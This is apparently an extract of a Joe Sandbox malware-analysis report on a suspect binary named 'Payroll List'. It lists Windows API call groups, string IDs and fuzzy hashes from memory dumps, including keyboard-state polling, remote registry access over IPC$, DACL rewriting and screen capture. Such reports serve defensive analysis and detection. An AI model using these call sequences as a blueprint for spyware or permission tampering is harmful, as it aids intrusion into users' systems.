                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                    • String ID: :$\$\??\%s
                                                                    • API String ID: 2733774712-3457252023
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0018BEF4,?,?), ref: 0018E754
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0018BEF4,?,?,00000000,?), ref: 0018E76B
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0018BEF4,?,?,00000000,?), ref: 0018E776
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,0018BEF4,?,?,00000000,?), ref: 0018E783
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0018E78C
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0018BEF4,?,?,00000000,?), ref: 0018E79B
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0018E7A4
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,0018BEF4,?,?,00000000,?), ref: 0018E7AB
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0018BEF4,?,?,00000000,?), ref: 0018E7BC
                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,001AD9BC,?), ref: 0018E7D5
                                                                    • GlobalFree.KERNEL32(00000000), ref: 0018E7E5
                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0018E809
                                                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0018E834
                                                                    • DeleteObject.GDI32(00000000), ref: 0018E85C
                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0018E872
                                                                    Similarity
                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                    • String ID:
                                                                    • API String ID: 3840717409-0
                                                                    APIs
                                                                    • __wsplitpath.LIBCMT ref: 0017076F
                                                                    • _wcscat.LIBCMT ref: 00170787
                                                                    • _wcscat.LIBCMT ref: 00170799
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001707AE
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 001707C2
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 001707DA
                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 001707F4
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00170806
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                    • String ID: *.*
                                                                    • API String ID: 34673085-438819550
                                                                    APIs
                                                                      • Part of subcall function 0013B34E: GetWindowLongW.USER32(?,000000EB), ref: 0013B35F
                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0018EF3B
                                                                    • GetFocus.USER32 ref: 0018EF4B
                                                                    • GetDlgCtrlID.USER32(00000000), ref: 0018EF56
                                                                    • _memset.LIBCMT ref: 0018F081
                                                                    • GetMenuItemInfoW.USER32 ref: 0018F0AC
                                                                    • GetMenuItemCount.USER32(00000000), ref: 0018F0CC
                                                                    • GetMenuItemID.USER32(?,00000000), ref: 0018F0DF
                                                                    • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0018F113
                                                                    • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0018F15B
                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0018F193
                                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0018F1C8
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                    • String ID: 0
                                                                    • API String ID: 1296962147-4108050209
                                                                    APIs
                                                                      • Part of subcall function 0015ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0015ABD7
                                                                      • Part of subcall function 0015ABBB: GetLastError.KERNEL32(?,0015A69F,?,?,?), ref: 0015ABE1
                                                                      • Part of subcall function 0015ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0015A69F,?,?,?), ref: 0015ABF0
                                                                      • Part of subcall function 0015ABBB: HeapAlloc.KERNEL32(00000000,?,0015A69F,?,?,?), ref: 0015ABF7
                                                                      • Part of subcall function 0015ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0015AC0E
                                                                      • Part of subcall function 0015AC56: GetProcessHeap.KERNEL32(00000008,0015A6B5,00000000,00000000,?,0015A6B5,?), ref: 0015AC62
                                                                      • Part of subcall function 0015AC56: HeapAlloc.KERNEL32(00000000,?,0015A6B5,?), ref: 0015AC69
                                                                      • Part of subcall function 0015AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0015A6B5,?), ref: 0015AC7A
                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0015A8CB
                                                                    • _memset.LIBCMT ref: 0015A8E0
                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0015A8FF
                                                                    • GetLengthSid.ADVAPI32(?), ref: 0015A910
                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0015A94D
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0015A969
                                                                    • GetLengthSid.ADVAPI32(?), ref: 0015A986
                                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0015A995
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0015A99C
                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0015A9BD
                                                                    • CopySid.ADVAPI32(00000000), ref: 0015A9C4
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0015A9F5
                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0015AA1B
                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0015AA2F
                                                                    Similarity
                                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                    • String ID:
                                                                    • API String ID: 3996160137-0
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 00179E36
                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00179E42
                                                                    • CreateCompatibleDC.GDI32(?), ref: 00179E4E
                                                                    • SelectObject.GDI32(00000000,?), ref: 00179E5B
                                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00179EAF
                                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00179EEB
                                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00179F0F
                                                                    • SelectObject.GDI32(00000006,?), ref: 00179F17
                                                                    • DeleteObject.GDI32(?), ref: 00179F20
                                                                    • DeleteDC.GDI32(00000006), ref: 00179F27
                                                                    • ReleaseDC.USER32(00000000,?), ref: 00179F32
                                                                    Similarity
                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                    • String ID: (
                                                                    • API String ID: 2598888154-3887548279
                                                                    Similarity
                                                                    • API ID: LoadString__swprintf_wprintf
                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                    • API String ID: 2889450990-2391861430
                                                                    Similarity
                                                                    • API ID: LoadString__swprintf_wprintf
                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                    • API String ID: 2889450990-3420473620
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 001655D7
                                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00165664
                                                                    • GetMenuItemCount.USER32(001E1708), ref: 001656ED
                                                                    • DeleteMenu.USER32(001E1708,00000005,00000000,000000F5,?,?), ref: 0016577D
                                                                    • DeleteMenu.USER32(001E1708,00000004,00000000), ref: 00165785
                                                                    • DeleteMenu.USER32(001E1708,00000006,00000000), ref: 0016578D
                                                                    • DeleteMenu.USER32(001E1708,00000003,00000000), ref: 00165795
                                                                    • GetMenuItemCount.USER32(001E1708), ref: 0016579D
                                                                    • SetMenuItemInfoW.USER32(001E1708,00000004,00000000,00000030), ref: 001657D3
                                                                    • GetCursorPos.USER32(?), ref: 001657DD
                                                                    • SetForegroundWindow.USER32(00000000), ref: 001657E6
                                                                    • TrackPopupMenuEx.USER32(001E1708,00000000,?,00000000,00000000,00000000), ref: 001657F9
                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00165805
                                                                    Similarity
                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                    • String ID:
                                                                    • API String ID: 3993528054-0
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0015A1DC
                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0015A211
                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0015A22D
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0015A249
                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0015A273
                                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0015A29B
                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0015A2A6
                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0015A2AB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                    • API String ID: 1687751970-22481851
                                                                    • Opcode ID: f31b20cfe645178bbabd962c7668b95e3fb5549c7134fd02481a61632fe77484
                                                                    • Instruction ID: 132437ab11caaddcefa8fe8ad2157695fe79eb3f8257a476b0848a3deb7f5efe
                                                                    • Opcode Fuzzy Hash: f31b20cfe645178bbabd962c7668b95e3fb5549c7134fd02481a61632fe77484
                                                                    • Instruction Fuzzy Hash: 32411872C10629AFDF11EBA4EC95DEDB7B8BF14300F404169F912A7160EB709E19CB90
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00182BB5,?,?), ref: 00183C1D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper
                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                    • API String ID: 3964851224-909552448
                                                                    • Opcode ID: 3060e19fb7731efade79ef9d8683c8c46a2ce89a7f1cdebf1fa08c7e091f7a4c
                                                                    • Instruction ID: 9fccb26147b2b5f9b3937b154f284642ae51577371afcf84eb31120a29efe058
                                                                    • Opcode Fuzzy Hash: 3060e19fb7731efade79ef9d8683c8c46a2ce89a7f1cdebf1fa08c7e091f7a4c
                                                                    • Instruction Fuzzy Hash: 92413D3010024A8BDF04FF50E991AEE3365AF22740F545955FC693B292EB70AB1ACF50
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,001936F4,00000010,?,Bad directive syntax error,001BDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 001625D6
                                                                    • LoadStringW.USER32(00000000,?,001936F4,00000010), ref: 001625DD
                                                                    • _wprintf.LIBCMT ref: 00162610
                                                                    • __swprintf.LIBCMT ref: 00162632
                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 001626A1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                    • API String ID: 1080873982-4153970271
                                                                    • Opcode ID: 170d97be5654b1467766a5dab9e9ded5d02582f42cdfef65d860e43af4404bf5
                                                                    • Instruction ID: f5076932a9c93594817642c973e1f1cc476865bef2e075ce2eb739b0c3c84bc6
                                                                    • Opcode Fuzzy Hash: 170d97be5654b1467766a5dab9e9ded5d02582f42cdfef65d860e43af4404bf5
                                                                    • Instruction Fuzzy Hash: E2219131C0022ABFCF11AF90DC4AEEE7B39BF28304F000455F515661A2EB71A668DB51
                                                                    APIs
                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00167B42
                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00167B58
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00167B69
                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00167B7B
                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00167B8C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: SendString
                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                    • API String ID: 890592661-1007645807
                                                                    • Opcode ID: be789f6c568c1b492aa6d5927d71ef6fb434d7fc5e19ed286d2aa9174e434893
                                                                    • Instruction ID: b3f674674f45f1bad2182942a093f69f1b5185b37225bdbadf6dd099afc45218
                                                                    • Opcode Fuzzy Hash: be789f6c568c1b492aa6d5927d71ef6fb434d7fc5e19ed286d2aa9174e434893
                                                                    • Instruction Fuzzy Hash: D711C4B16402697DD720B7A1DC8ADFF7B7CEBE1B04F00052A7421A31D1DB600A54C5B1
                                                                    APIs
                                                                    • timeGetTime.WINMM ref: 00167794
                                                                      • Part of subcall function 0013DC38: timeGetTime.WINMM(?,76C1B400,001958AB), ref: 0013DC3C
                                                                    • Sleep.KERNEL32(0000000A), ref: 001677C0
                                                                    • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 001677E4
                                                                    • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00167806
                                                                    • SetActiveWindow.USER32 ref: 00167825
                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00167833
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00167852
                                                                    • Sleep.KERNEL32(000000FA), ref: 0016785D
                                                                    • IsWindow.USER32 ref: 00167869
                                                                    • EndDialog.USER32(00000000), ref: 0016787A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                    • String ID: BUTTON
                                                                    • API String ID: 1194449130-3405671355
                                                                    • Opcode ID: 0682764bf5cf1647f31f8c6bdb3c1acdaf9a917589bf3637a650929d5ea8459c
                                                                    • Instruction ID: 00fbce6d1d969add73dabf1c3c4c27813aa3a4dc30e844683b5d77f17b92a386
                                                                    • Opcode Fuzzy Hash: 0682764bf5cf1647f31f8c6bdb3c1acdaf9a917589bf3637a650929d5ea8459c
                                                                    • Instruction Fuzzy Hash: 64216AB1204645AFE7055BA0FCCDE2A7F6AFB0634CF050068F51687EA2DB718DA0DA21
                                                                    APIs
                                                                      • Part of subcall function 0012936C: __swprintf.LIBCMT ref: 001293AB
                                                                      • Part of subcall function 0012936C: __itow.LIBCMT ref: 001293DF
                                                                    • CoInitialize.OLE32(00000000), ref: 0017034B
                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 001703DE
                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 001703F2
                                                                    • CoCreateInstance.OLE32(001ADA8C,00000000,00000001,001D3CF8,?), ref: 0017043E
                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 001704AD
                                                                    • CoTaskMemFree.OLE32(?,?), ref: 00170505
                                                                    • _memset.LIBCMT ref: 00170542
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0017057E
                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 001705A1
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 001705A8
                                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 001705DF
                                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 001705E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                    • String ID:
                                                                    • API String ID: 1246142700-0
                                                                    • Opcode ID: c4c9f345cdb927b8ffdf7cecb387d407afc84f9cfa6798ed325b82350d65b315
                                                                    • Instruction ID: c56b3eca243488fef962cb5dd85f01d3f86b9796f1447280b13f4c5e305eeb9e
                                                                    • Opcode Fuzzy Hash: c4c9f345cdb927b8ffdf7cecb387d407afc84f9cfa6798ed325b82350d65b315
                                                                    • Instruction Fuzzy Hash: 7CB1D975A00219EFDB05DFA4D889DAEBBB9FF48304B148499F90AEB251DB30ED41CB50
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 00162ED6
                                                                    • SetKeyboardState.USER32(?), ref: 00162F41
                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00162F61
                                                                    • GetKeyState.USER32(000000A0), ref: 00162F78
                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00162FA7
                                                                    • GetKeyState.USER32(000000A1), ref: 00162FB8
                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00162FE4
                                                                    • GetKeyState.USER32(00000011), ref: 00162FF2
                                                                    • GetAsyncKeyState.USER32(00000012), ref: 0016301B
                                                                    • GetKeyState.USER32(00000012), ref: 00163029
                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00163052
                                                                    • GetKeyState.USER32(0000005B), ref: 00163060
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: State$Async$Keyboard
                                                                    • String ID:
                                                                    • API String ID: 541375521-0
                                                                    • Opcode ID: 539afabefa5d95246e67f07298bd5acb9953994ac8b15791c13e0071eb6045d1
                                                                    • Instruction ID: 02b15cfdb12437398a801b4e0a02c289cde807c2c6f1347393d6f03b8946f6a9
                                                                    • Opcode Fuzzy Hash: 539afabefa5d95246e67f07298bd5acb9953994ac8b15791c13e0071eb6045d1
                                                                    • Instruction Fuzzy Hash: BB51F960A08B9429FB35EBB48D107EABFF45F12340F08459DD5C2575C2DBA4AB9CC7A2
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000001), ref: 0015ED1E
                                                                    • GetWindowRect.USER32(00000000,?), ref: 0015ED30
                                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0015ED8E
                                                                    • GetDlgItem.USER32(?,00000002), ref: 0015ED99
                                                                    • GetWindowRect.USER32(00000000,?), ref: 0015EDAB
                                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0015EE01
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0015EE0F
                                                                    • GetWindowRect.USER32(00000000,?), ref: 0015EE20
                                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0015EE63
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0015EE71
                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0015EE8E
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0015EE9B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                    • String ID:
                                                                    • API String ID: 3096461208-0
                                                                    • Opcode ID: 5e70b664b540b5971dde4bf6dab05d4ffe16a41da18cf6e440e07c85b075a437
                                                                    • Instruction ID: 693f7b49660e8e4a63b6ee4fcb1442b05a3750724369002e29f078de22eac19b
                                                                    • Opcode Fuzzy Hash: 5e70b664b540b5971dde4bf6dab05d4ffe16a41da18cf6e440e07c85b075a437
                                                                    • Instruction Fuzzy Hash: 745133B1B00605EFDB18CF68DD85AAEBBF6FB89311F148129F91AD7690D7709E448B10
                                                                    APIs
                                                                      • Part of subcall function 0013B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0013B759,?,00000000,?,?,?,?,0013B72B,00000000,?), ref: 0013BA58
                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0013B72B), ref: 0013B7F6
                                                                    • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0013B72B,00000000,?,?,0013B2EF,?,?), ref: 0013B88D
                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 0019D8A6
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0013B72B,00000000,?,?,0013B2EF,?,?), ref: 0019D8D7
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0013B72B,00000000,?,?,0013B2EF,?,?), ref: 0019D8EE
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0013B72B,00000000,?,?,0013B2EF,?,?), ref: 0019D90A
                                                                    • DeleteObject.GDI32(00000000), ref: 0019D91C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                    • String ID:
                                                                    • API String ID: 641708696-0
                                                                    • Opcode ID: cb651a49c326ba520ec6b51551fab4941e130a660d59e7c2da54fe08e0b12e6b
                                                                    • Instruction ID: e0828430cd7737d107dd9601e1759796392228ac625c20f7d3ebfaedb0909c23
                                                                    • Opcode Fuzzy Hash: cb651a49c326ba520ec6b51551fab4941e130a660d59e7c2da54fe08e0b12e6b
                                                                    • Instruction Fuzzy Hash: 8D61AC30505A40EFDB2A9F58E9C8B69B7B5FF99316F15011DE6468AEB0D7B0A8C0CF40
                                                                    APIs
                                                                      • Part of subcall function 0013B526: GetWindowLongW.USER32(?,000000EB), ref: 0013B537
                                                                    • GetSysColor.USER32(0000000F), ref: 0013B438
                                                                    Memory Dump Source
